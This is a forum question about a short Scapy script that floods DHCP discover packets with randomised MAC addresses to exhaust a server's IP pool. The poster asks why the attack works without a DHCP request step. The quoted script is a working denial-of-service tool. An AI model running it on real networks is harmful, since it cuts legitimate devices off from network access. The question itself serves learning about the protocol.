I came across this DHCP Exhaustion/DoS Scapy script. It works by making multiple DHCP Discovery packets from different MAC addresses in order to use all of the available IP addresses on the DHCP server.
From my knowledge, a device sends a DHCP discovery packet in order to get an IP address then the DHCP server sends a offer packet, the client sends a DHCP request and then finally the DHCP server sends a final packet saying that the device is allowed to use the IP address.
HOWEVER, in this script it only sends a DHCP discovery packet. How does this script work if the client also needs to send a DHCP request back to the DHCP server in order for the DHCP server to send a packet back that 'finalizes' the IP address allocation.
from scapy.all import *
dhcp_discover = Ether(dst='ff:ff:ff:ff:ff:ff',src=RandMAC()) \
/IP(src='0.0.0.0',dst='255.255.255.255') \
/UDP(sport=68,dport=67) \
/BOOTP(op=1,chaddr = RandMAC()) \
/DHCP(options=[('message-type','discover'),('end')])
sendp(dhcp_discover,iface='eth0',loop=1,verbose=1)
My only guess is that when I run the script, my computer's kernel handles the DHCP request packet and thus, finalizes the allocation. Is this correct??